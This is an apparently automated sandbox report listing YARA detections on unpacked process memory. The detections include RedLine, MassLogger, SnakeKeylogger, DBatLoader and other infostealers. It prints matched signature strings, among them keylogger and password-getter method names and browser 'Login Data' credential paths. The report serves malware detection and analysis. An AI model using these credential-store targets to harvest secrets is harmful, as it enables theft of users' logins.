6.2.vcc.exe.210b6e48.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
11.2.daphpvwO.pif.29020ca6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.2a3b5570.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bcd1:$a1: get_encryptedPassword 0x1bca5:$a2: get_encryptedUsername 0x1bd69:$a3: get_timePasswordChanged 0x1bc81:$a4: get_passwordField 0x1bce7:$a5: set_encryptedPassword 0x1bab4:$a7: get_logins 0x1b03e:$a8: GetOutlookPasswords 0x1a567:$a9: StartKeylogger 0x18f9f:$a10: KeyLoggerEventArgs 0x18f6e:$a11: KeyLoggerEventArgsEventHandler 0x1bb88:$a13: _encryptedPassword
11.2.daphpvwO.pif.2a3b5570.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x204af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f9ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1fcbb:$a4: \Orbitum\User Data\Default\Login Data 0x20ab3:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
11.2.daphpvwO.pif.2a3de990.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
11.2.daphpvwO.pif.29021b8e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.29021b8e.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29021b8e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29021b8e.2.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29021b8e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29021b8e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29021b8e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
11.2.daphpvwO.pif.29021b8e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
6.2.vcc.exe.21d9548.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
11.1.daphpvwO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.vcc.exe.2880000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
11.2.daphpvwO.pif.29020ca6.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29020ca6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29020ca6.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29020ca6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29020ca6.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29020ca6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bcd1:$a1: get_encryptedPassword 0x1bca5:$a2: get_encryptedUsername 0x1bd69:$a3: get_timePasswordChanged 0x1bc81:$a4: get_passwordField 0x1bce7:$a5: set_encryptedPassword 0x1bab4:$a7: get_logins 0x1b03e:$a8: GetOutlookPasswords 0x1a567:$a9: StartKeylogger 0x18f9f:$a10: KeyLoggerEventArgs 0x18f6e:$a11: KeyLoggerEventArgsEventHandler 0x1bb88:$a13: _encryptedPassword
11.2.daphpvwO.pif.29020ca6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x204af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f9ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1fcbb:$a4: \Orbitum\User Data\Default\Login Data 0x20ab3:$a5: \Kometa\User Data\Default\Login Data
11.1.daphpvwO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
6.2.vcc.exe.21d9548.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
11.2.daphpvwO.pif.2a3b6458.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x46009:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x45fdd:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x460a1:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x45fb9:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x4601f:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x45dec:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x45376:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x4489f:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x432d7:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x432a6:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
11.2.daphpvwO.pif.2a3b5570.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a7e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x49ce5:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x49ff3:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data 0x4adeb:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.2b930000.9.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2b930000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2b930000.9.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2b930000.9.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2b930000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2b930000.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
11.2.daphpvwO.pif.2b930000.9.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
11.1.daphpvwO.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x45121:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x450f5:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x451b9:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x450d1:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x45137:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x44f04:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x4448e:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x439b7:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x423ef:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x423be:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
11.2.daphpvwO.pif.2a3b6458.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x498ff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x48dfd:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x4910b:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data 0x49f03:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.29240000.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29240000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29240000.5.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29240000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29240000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29240000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
11.2.daphpvwO.pif.29240000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.29240ee8.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29240ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29240ee8.4.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29240ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29240ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29240ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
11.2.daphpvwO.pif.29240ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
6.2.vcc.exe.212605a8.8.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.daphpvwO.pif.2b930000.9.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2b930000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2b930000.9.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2b930000.9.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2b930000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2b930000.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
11.2.daphpvwO.pif.2b930000.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.2a3de990.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.2a3de990.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.2a3de990.8.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.2a3de990.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.2a3de990.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.2a3de990.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
11.2.daphpvwO.pif.2a3de990.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
11.2.daphpvwO.pif.29240000.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29240000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29240000.5.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29240000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29240000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
